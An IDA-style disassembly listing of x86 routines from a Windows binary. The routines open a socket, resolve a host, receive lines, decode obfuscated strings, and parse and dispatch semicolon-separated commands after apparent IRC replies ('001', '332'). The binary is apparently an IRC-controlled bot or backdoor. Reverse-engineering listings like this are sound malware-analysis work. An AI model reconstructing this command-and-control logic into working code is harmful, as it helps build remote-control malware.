sub_4182F6	proc near		; CODE XREF: sub_4184BD+6A7p

var_820		= dword	ptr -820h
var_81C		= dword	ptr -81Ch
var_20		= byte ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 824h
		push	ebx
		push	esi
		push	edi
		push	offset asc_421474 ; " "
		push	[ebp+arg_14]
		xor	ebx, ebx
		mov	byte ptr [ebp+var_8], 0
		mov	[ebp+var_4], ebx
		call	sub_403FC4
		jmp	short loc_418358
; ---------------------------------------------------------------------------

loc_41831A:				; CODE XREF: sub_4182F6+68j
		mov	eax, [ebp+var_4]
		push	offset aS_9	; "-s"
		push	esi
		mov	[ebp+eax*4+var_820], esi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_418346
		push	offset aS_10	; "/s"
		push	esi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41834A

loc_418346:				; CODE XREF: sub_4182F6+3Dj
		mov	byte ptr [ebp+var_8], 1

loc_41834A:				; CODE XREF: sub_4182F6+4Ej
		push	offset asc_421480 ; " "
		push	ebx
		call	sub_403FC4
		inc	[ebp+var_4]

loc_418358:				; CODE XREF: sub_4182F6+22j
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jnz	short loc_41831A
		mov	edi, [ebp+arg_0]
		mov	esi, [ebp+var_820]
		add	edi, 5
		mov	edx, edi
		mov	ecx, esi

loc_418370:				; CODE XREF: sub_4182F6+92j
		mov	al, [ecx]
		cmp	al, [edx]
		jnz	short loc_41838E
		test	al, al
		jz	short loc_41838A
		mov	al, [ecx+1]
		cmp	al, [edx+1]
		jnz	short loc_41838E
		inc	ecx
		inc	ecx
		inc	edx
		inc	edx
		test	al, al
		jnz	short loc_418370

loc_41838A:				; CODE XREF: sub_4182F6+82j
		xor	eax, eax
		jmp	short loc_418393
; ---------------------------------------------------------------------------

loc_41838E:				; CODE XREF: sub_4182F6+7Ej
					; sub_4182F6+8Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418393:				; CODE XREF: sub_4182F6+96j
		cmp	eax, ebx
		jz	short loc_4183A4
		mov	eax, edi
		mov	ecx, esi
		call	sub_419CC4
		test	eax, eax
		jz	short loc_4183D0

loc_4183A4:				; CODE XREF: sub_4182F6+9Fj
		xor	eax, eax
		cmp	[ebp+var_4], ebx
		jle	short loc_4183CD
		mov	ecx, [ebp+var_4]
		dec	ecx

loc_4183AF:				; CODE XREF: sub_4182F6+CFj
		cmp	eax, ecx
		jz	short loc_4183C1
		mov	edx, [ebp+eax*4+var_81C]
		mov	[ebp+eax*4+var_820], edx

loc_4183C1:				; CODE XREF: sub_4182F6+BBj
		inc	eax
		cmp	eax, [ebp+var_4]
		jl	short loc_4183AF
		mov	esi, [ebp+var_820]

loc_4183CD:				; CODE XREF: sub_4182F6+B3j
		dec	[ebp+var_4]

loc_4183D0:				; CODE XREF: sub_4182F6+ACj
		cmp	byte ptr [ebp+var_8], bl
		jz	short loc_4183D8
		dec	[ebp+var_4]

loc_4183D8:				; CODE XREF: sub_4182F6+DDj
		mov	al, [esi]
		cmp	al, byte_4271D0
		jnz	loc_4184B6
		mov	eax, esi
		lea	ecx, [eax+1]

loc_4183EB:				; CODE XREF: sub_4182F6+FAj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4183EB
		sub	eax, ecx
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	esi
		call	sub_403EA0
		mov	eax, dword_437680
		mov	esi, [eax]
		mov	ebx, offset dword_43767C
		mov	edi, ebx
		add	esp, 0Ch
		mov	[ebp+var_C], esi
		mov	[ebp+var_10], edi

loc_418416:				; CODE XREF: sub_4182F6+192j
		test	edi, edi
		mov	eax, dword_437680
		mov	[ebp+var_14], eax
		jz	short loc_418426
		cmp	edi, ebx
		jz	short loc_41842B

loc_418426:				; CODE XREF: sub_4182F6+12Aj
		call	sub_4034EB

loc_41842B:				; CODE XREF: sub_4182F6+12Ej
		cmp	esi, [ebp+var_14]
		jz	loc_4184B6
		test	edi, edi
		jnz	short loc_41843D
		call	sub_4034EB

loc_41843D:				; CODE XREF: sub_4182F6+140j
		cmp	esi, [edi+4]
		jnz	short loc_418447
		call	sub_4034EB

loc_418447:				; CODE XREF: sub_4182F6+14Aj
		mov	ecx, [ebp+var_820]
		lea	eax, [esi+0Ch]

loc_418450:				; CODE XREF: sub_4182F6+172j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_41846E
		test	dl, dl
		jz	short loc_41846A
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_41846E
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418450

loc_41846A:				; CODE XREF: sub_4182F6+162j
		xor	eax, eax
		jmp	short loc_418473
; ---------------------------------------------------------------------------

loc_41846E:				; CODE XREF: sub_4182F6+15Ej
					; sub_4182F6+16Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418473:				; CODE XREF: sub_4182F6+176j
		test	eax, eax
		jz	short loc_41848A
		lea	edi, [ebp+var_20]
		lea	esi, [ebp+var_10]
		call	sub_40166F
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jmp	short loc_418416
; ---------------------------------------------------------------------------

loc_41848A:				; CODE XREF: sub_4182F6+17Fj
		cmp	esi, [edi+4]
		jnz	short loc_418494
		call	sub_4034EB

loc_418494:				; CODE XREF: sub_4182F6+197j
		mov	ecx, [esi+8]
		mov	eax, [ecx]
		lea	edx, [ebp+var_820]
		push	edx
		mov	edx, [ebp+var_4]
		dec	edx
		push	edx
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+var_8]
		push	[ebp+arg_4]
		call	dword ptr [eax]

loc_4184B6:				; CODE XREF: sub_4182F6+EAj
					; sub_4182F6+138j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	18h
sub_4182F6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4184BD	proc near		; CODE XREF: sub_418B81+107p

var_10F34	= dword	ptr -10F34h
var_10734	= dword	ptr -10734h
var_10730	= dword	ptr -10730h
var_1072C	= byte ptr -1072Ch
var_1062C	= byte ptr -1062Ch
var_1052C	= byte ptr -1052Ch
var_1042C	= byte ptr -1042Ch
var_72C		= byte ptr -72Ch
var_72B		= byte ptr -72Bh
var_62C		= byte ptr -62Ch
var_62B		= byte ptr -62Bh
var_52C		= byte ptr -52Ch
var_52B		= byte ptr -52Bh
var_52A		= byte ptr -52Ah
var_32C		= byte ptr -32Ch
var_32B		= byte ptr -32Bh
var_22C		= byte ptr -22Ch
var_22B		= byte ptr -22Bh
var_1AC		= byte ptr -1ACh
var_1AB		= byte ptr -1ABh
var_A8		= byte ptr -0A8h
var_A7		= byte ptr -0A7h
var_78		= byte ptr -78h
var_77		= byte ptr -77h
var_54		= byte ptr -54h
var_53		= byte ptr -53h
var_44		= byte ptr -44h
var_43		= byte ptr -43h
var_38		= byte ptr -38h
var_37		= byte ptr -37h
var_2C		= byte ptr -2Ch
var_2B		= byte ptr -2Bh
var_20		= byte ptr -20h
var_1F		= byte ptr -1Fh
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, 10F38h
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_10734], eax
		lea	eax, [ebp+var_52B]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_10730], edi
		mov	[ebp+var_52C], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	offset aS_13	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_52C]
		add	esp, 10h
		lea	edi, [eax+1]

loc_418525:				; CODE XREF: sub_4184BD+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418525
		sub	eax, edi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		push	offset asc_421400 ; " :"
		push	eax
		call	sub_403D40
		push	eax
		push	offset aS_14	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_52C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_418565:				; CODE XREF: sub_4184BD+ADj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418565
		sub	eax, esi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		lea	esi, [eax+1]

loc_41857E:				; CODE XREF: sub_4184BD+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41857E
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_52A]
		push	eax
		lea	eax, [ebp+var_52C]
		push	eax
		call	sub_403EA0
		add	esp, 0Ch
		push	offset asc_421408 ; " "
		push	[ebp+var_10730]
		call	sub_403FC4
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		jz	short loc_4185FF
		xor	esi, esi

loc_4185B6:				; CODE XREF: sub_4184BD+140j
		push	eax
		push	offset aS_15	; "%s"
		lea	edi, [ebp+esi+var_1072C]
		push	0FFh
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 10h
		lea	edi, [eax+1]

loc_4185D6:				; CODE XREF: sub_4184BD+11Ej
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4185D6
		sub	eax, edi
		add	eax, esi
		push	offset asc_421410 ; " "
		push	ebx
		mov	[ebp+eax+var_1072C], bl
		call	sub_403FC4
		pop	ecx
		add	esi, 100h
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_4185B6

loc_4185FF:				; CODE XREF: sub_4184BD+F5j
		xor	eax, eax
		mov	[ebp+var_2C], bl
		lea	edi, [ebp+var_2B]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_38], bl
		lea	edi, [ebp+var_37]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_54], bl
		lea	edi, [ebp+var_53]
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_20], bl
		lea	edi, [ebp+var_1F]
		stosd
		push	0FFh
		stosd
		lea	eax, [ebp+var_32B]
		push	ebx
		push	eax
		mov	[ebp+var_32C], bl
		call	sub_408130
		add	esp, 0Ch
		push	2Fh
		lea	eax, [ebp+var_A7]
		push	ebx
		push	eax
		mov	[ebp+var_A8], bl
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_44], bl
		lea	edi, [ebp+var_43]
		stosd
		add	esp, 0Ch
		push	7Fh
		stosd
		lea	eax, [ebp+var_22B]
		push	ebx
		push	eax
		mov	[ebp+var_22C], bl
		call	sub_408130
		add	esp, 0Ch
		push	9
		lea	esi, [ebp+var_2C]
		mov	ebx, offset aIpj ; ""
		call	sub_41A33D
		pop	ecx
		push	9
		lea	esi, [ebp+var_38]
		mov	ebx, offset aKivk ; ""
		call	sub_41A33D
		pop	ecx
		push	0Dh
		lea	esi, [ebp+var_54]
		mov	ebx, offset aIMJ ; ""
		call	sub_41A33D
		pop	ecx
		lea	ecx, [ebp+var_2C]
		lea	eax, [ebp+var_1072C]

loc_4186C0:				; CODE XREF: sub_4184BD+21Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_4186DE
		test	dl, dl
		jz	short loc_4186DA
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_4186DE
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4186C0

loc_4186DA:				; CODE XREF: sub_4184BD+20Bj
		xor	eax, eax
		jmp	short loc_4186E3
; ---------------------------------------------------------------------------

loc_4186DE:				; CODE XREF: sub_4184BD+207j
					; sub_4184BD+213j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4186E3:				; CODE XREF: sub_4184BD+21Fj
		test	eax, eax
		jnz	short loc_418727
		push	9
		lea	esi, [ebp+var_20]
		mov	ebx, offset aOpj ; ""
		call	sub_41A33D
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_1062C]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_10	; "%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41871F

loc_418718:				; CODE XREF: sub_4184BD+333j
		xor	al, al
		jmp	loc_418B70
; ---------------------------------------------------------------------------

loc_41871F:				; CODE XREF: sub_4184BD+259j
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosb

loc_418727:				; CODE XREF: sub_4184BD+228j
		lea	ecx, [ebp+var_38]
		lea	eax, [ebp+var_1062C]

loc_418730:				; CODE XREF: sub_4184BD+28Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_41874E
		test	dl, dl
		jz	short loc_41874A
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_41874E
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418730

loc_41874A:				; CODE XREF: sub_4184BD+27Bj
		xor	eax, eax
		jmp	short loc_418753
; ---------------------------------------------------------------------------

loc_41874E:				; CODE XREF: sub_4184BD+277j
					; sub_4184BD+283j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418753:				; CODE XREF: sub_4184BD+28Fj
		test	eax, eax
		jnz	loc_4187F5
		push	100h
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aSiU ; "‘ғ"
		call	sub_41A33D
		pop	ecx
		mov	ecx, esi
		lea	eax, [ebp+var_1052C]

loc_418779:				; CODE XREF: sub_4184BD+2D4j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_418797
		test	dl, dl
		jz	short loc_418793
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_418797
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418779

loc_418793:				; CODE XREF: sub_4184BD+2C4j
		xor	eax, eax
		jmp	short loc_41879C
; ---------------------------------------------------------------------------

loc_418797:				; CODE XREF: sub_4184BD+2C0j
					; sub_4184BD+2CCj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_41879C:				; CODE XREF: sub_4184BD+2D8j
		test	eax, eax
		jnz	loc_418B6E
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset aLoip ; ""
		call	sub_41A33D
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4271B8
		call	sub_41A33D
		mov	edi, [ebp+var_10734]
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aSSS_2	; "%s %s %s\r\n"
		call	sub_417F4C
		add	esp, 10h

loc_4187E8:				; CODE XREF: sub_4184BD+3E0j
		test	al, al
		jnz	loc_418B6E
		jmp	loc_418718
; ---------------------------------------------------------------------------

loc_4187F5:				; CODE XREF: sub_4184BD+298j
		push	4
		mov	edi, offset a001 ; "001"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_4188A2
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset aLoip ; ""
		call	sub_41A33D
		pop	ecx
		push	9
		lea	esi, [ebp+var_44]
		mov	ebx, offset aMoed ; ""
		call	sub_41A33D
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aSiU ; "‘ғ"
		mov	[esp+10h+var_10], 100h
		call	sub_41A33D
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4271B8
		call	sub_41A33D
		pop	ecx
		push	80h
		lea	esi, [ebp+var_22C]
		mov	ebx, offset byte_4271D1
		call	sub_41A33D
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_A8]
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [edi+5]
		push	eax
		lea	eax, [ebp+var_44]
		push	eax
		push	offset aSSSSSS	; "%s %s %s\r\n%s %s %s\r\n"
		call	sub_417F4C
		add	esp, 1Ch
		jmp	loc_4187E8
; ---------------------------------------------------------------------------

loc_4188A2:				; CODE XREF: sub_4184BD+34Aj
		lea	ecx, [ebp+var_54]
		lea	eax, [ebp+var_1062C]

loc_4188AB:				; CODE XREF: sub_4184BD+406j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_4188C9
		test	dl, dl
		jz	short loc_4188C5
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_4188C9
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4188AB

loc_4188C5:				; CODE XREF: sub_4184BD+3F6j
		xor	eax, eax
		jmp	short loc_4188CE
; ---------------------------------------------------------------------------

loc_4188C9:				; CODE XREF: sub_4184BD+3F2j
					; sub_4184BD+3FEj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4188CE:				; CODE XREF: sub_4184BD+40Aj
		test	eax, eax
		jz	short loc_4188EA
		push	4
		mov	edi, offset a332 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_418B6E

loc_4188EA:				; CODE XREF: sub_4184BD+413j
		push	8
		pop	ecx
		xor	eax, eax
		mov	[ebp+var_78], 0
		lea	edi, [ebp+var_77]
		rep stosd
		mov	ebx, 0FFh
		push	ebx
		stosw
		xor	esi, esi
		lea	eax, [ebp+var_1AB]
		push	esi
		push	eax
		mov	byte ptr [ebp+var_10730], 0
		mov	[ebp+var_1AC], 0
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_62B]
		push	esi
		push	eax
		mov	[ebp+var_62C], 0
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_72B]
		push	esi
		push	eax
		mov	[ebp+var_72C], 0
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+var_1072C]
		push	offset asc_421448 ; " :"
		push	eax
		call	sub_403FC4
		push	eax
		push	offset aS_1	; "%s"
		lea	eax, [ebp+var_62C]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_62C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_418980:				; CODE XREF: sub_4184BD+4C8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418980
		sub	eax, esi
		mov	[ebp+eax+var_62C], cl
		lea	eax, [ebp+var_1072C]
		push	offset asc_421450 ; "!"
		push	eax
		call	sub_403FC4
		push	eax
		push	offset aS_2	; "%s"
		lea	eax, [ebp+var_78]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_78]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4189BB:				; CODE XREF: sub_4184BD+503j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4189BB
		sub	eax, esi
		mov	[ebp+eax+var_78], cl
		lea	eax, [ebp+var_78]
		lea	esi, [eax+1]

loc_4189CE:				; CODE XREF: sub_4184BD+516j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4189CE
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_77]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		call	sub_403EA0
		add	esp, 0Ch
		push	4
		mov	edi, offset a332_0 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	short loc_418A34
		lea	eax, [ebp+var_1042C]
		push	eax
		push	offset aS_3	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418A21:				; CODE XREF: sub_4184BD+569j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418A21
		mov	byte ptr [ebp+var_10730], 1
		jmp	loc_418AC1
; ---------------------------------------------------------------------------

loc_418A34:				; CODE XREF: sub_4184BD+53Dj
		mov	esi, [ebp+var_10734]
		add	esi, 5
		lea	eax, [ebp+var_1052C]

loc_418A43:				; CODE XREF: sub_4184BD+59Ej
		mov	cl, [eax]
		cmp	cl, [esi]
		jnz	short loc_418A61
		test	cl, cl
		jz	short loc_418A5D
		mov	cl, [eax+1]
		cmp	cl, [esi+1]
		jnz	short loc_418A61
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_418A43

loc_418A5D:				; CODE XREF: sub_4184BD+58Ej
		xor	eax, eax
		jmp	short loc_418A66
; ---------------------------------------------------------------------------

loc_418A61:				; CODE XREF: sub_4184BD+58Aj
					; sub_4184BD+596j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418A66:				; CODE XREF: sub_4184BD+5A2j
		test	eax, eax
		jnz	short loc_418A95
		lea	eax, [ebp+var_78]
		push	eax
		push	offset aS_4	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418A8C:				; CODE XREF: sub_4184BD+5D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418A8C
		jmp	short loc_418AC1
; ---------------------------------------------------------------------------

loc_418A95:				; CODE XREF: sub_4184BD+5ABj
		lea	eax, [ebp+var_1052C]
		push	eax
		push	offset aS_5	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418ABA:				; CODE XREF: sub_4184BD+602j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418ABA

loc_418AC1:				; CODE XREF: sub_4184BD+572j
					; sub_4184BD+5D6j
		sub	eax, edx
		push	100h
		lea	esi, [ebp+var_72C]
		mov	ebx, offset aDfsiouiabTmokd ; "ϒ̃ς"
		mov	[ebp+eax+var_1AC], 0
		call	sub_41A33D
		pop	ecx
		lea	eax, [ebp+var_62C]
		mov	ecx, esi
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_418AFA
		cmp	byte ptr [ebp+var_10730], al
		jz	short loc_418B6E

loc_418AFA:				; CODE XREF: sub_4184BD+633j
		xor	edi, edi
		cmp	byte ptr [ebp+var_10730], 0
		lea	eax, [ebp+var_52C]
		jz	short loc_418B12
		push	offset asc_421468 ; ";"
		jmp	short loc_418B17
; ---------------------------------------------------------------------------

loc_418B12:				; CODE XREF: sub_4184BD+64Cj
		push	offset asc_42146C ; ";"

loc_418B17:				; CODE XREF: sub_4184BD+653j
		push	eax
		call	sub_403FC4
		jmp	short loc_418B33
; ---------------------------------------------------------------------------

loc_418B1F:				; CODE XREF: sub_4184BD+67Aj
		push	offset asc_421470 ; ";"
		push	0
		mov	[ebp+edi*4+var_10F34], eax
		call	sub_403FC4
		inc	edi

loc_418B33:				; CODE XREF: sub_4184BD+660j
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_418B1F
		xor	esi, esi
		test	edi, edi
		jle	short loc_418B6E

loc_418B3F:				; CODE XREF: sub_4184BD+6AFj
		push	[ebp+esi*4+var_10F34]
		lea	eax, [ebp+var_1AC]
		push	eax
		lea	eax, [ebp+var_62C]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		push	[ebp+var_10730]
		push	[ebp+var_10734]
		call	sub_4182F6
		inc	esi
		cmp	esi, edi
		jl	short loc_418B3F

loc_418B6E:				; CODE XREF: sub_4184BD+2E1j
					; sub_4184BD+32Dj ...
		mov	al, 1

loc_418B70:				; CODE XREF: sub_4184BD+25Dj
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
sub_4184BD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418B81	proc near		; CODE XREF: sub_41C7BA+436p

var_20414	= dword	ptr -20414h
var_20410	= dword	ptr -20410h
var_2040C	= dword	ptr -2040Ch
var_20408	= byte ptr -20408h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		mov	eax, 20414h
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_407]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_20414], edi
		mov	[ebp+var_408], bl
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	esi
		lea	eax, [ebp+var_408]
		push	eax
		push	dword ptr [edi]
		mov	[ebp+var_2040C], ebx
		call	ds:dword_41E26C	; recv
		test	eax, eax
		jz	loc_418C96
		lea	eax, [ebp+var_408]
		lea	edx, [eax+1]

loc_418BE9:				; CODE XREF: sub_418B81+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418BE9
		sub	eax, edx
		mov	[ebp+eax+var_408], bl
		lea	eax, [ebp+var_408]
		push	offset asc_4213E4 ; "\r\n"
		push	eax
		call	sub_403FC4
		push	20000h
		mov	edi, eax
		lea	eax, [ebp+var_20408]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 14h
		cmp	edi, ebx
		mov	esi, 200h
		jz	short loc_418C6C
		lea	eax, [ebp+var_20408]
		mov	[ebp+var_20410], eax

loc_418C36:				; CODE XREF: sub_418B81+E9j
		push	edi
		push	offset aS_11	; "%s"
		push	1FFh
		push	[ebp+var_20410]
		call	sub_40307C
		push	offset asc_4213EC ; "\r\n"
		push	ebx
		call	sub_403FC4
		add	[ebp+var_20410], esi
		add	esp, 18h
		inc	[ebp+var_2040C]
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_418C36

loc_418C6C:				; CODE XREF: sub_418B81+A7j
		cmp	[ebp+var_2040C], ebx
		jle	short loc_418C92
		mov	ebx, [ebp+var_2040C]
		lea	edi, [ebp+var_20408]

loc_418C80:				; CODE XREF: sub_418B81+10Fj
		push	[ebp+var_20414]
		mov	ecx, edi
		call	sub_4184BD
		add	edi, esi
		dec	ebx
		jnz	short loc_418C80

loc_418C92:				; CODE XREF: sub_418B81+F1j
		mov	al, 1
		jmp	short loc_418CA0
; ---------------------------------------------------------------------------

loc_418C96:				; CODE XREF: sub_418B81+59j
		push	dword ptr [edi]
		call	ds:dword_41E280	; closesocket
		xor	al, al

loc_418CA0:				; CODE XREF: sub_418B81+113j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_418B81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418CAF	proc near		; CODE XREF: sub_41C7BA+424p

var_450		= dword	ptr -450h
var_44C		= dword	ptr -44Ch
var_448		= byte ptr -448h
var_447		= byte ptr -447h
var_444		= byte ptr -444h
var_443		= byte ptr -443h
var_440		= word ptr -440h
var_43E		= word ptr -43Eh
var_43C		= byte ptr -43Ch
var_430		= byte ptr -430h
var_42F		= byte ptr -42Fh
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_30		= byte ptr -30h
var_2F		= byte ptr -2Fh
var_24		= byte ptr -24h
var_23		= byte ptr -23h
var_18		= byte ptr -18h
var_17		= byte ptr -17h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 454h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		push	0
		push	1
		mov	edi, ecx
		push	2
		mov	[ebp+var_450], edi
		mov	ebx, edx
		mov	[ebp+var_44C], eax
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[edi], eax
		jnz	short loc_418CF9
		push	eax

loc_418CEC:				; CODE XREF: sub_418CAF+8Bj
		call	ds:dword_41E280	; closesocket
		xor	al, al
		jmp	loc_418F0B
; ---------------------------------------------------------------------------

loc_418CF9:				; CODE XREF: sub_418CAF+3Aj
		push	1FFh
		lea	eax, [ebp+var_22F]
		push	0
		push	eax
		mov	[ebp+var_230], 0
		call	sub_408130
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_230]
		call	sub_41A33D
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41E244	; gethostbyname
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		jnz	short loc_418D3C

loc_418D38:				; CODE XREF: sub_418CAF+E7j
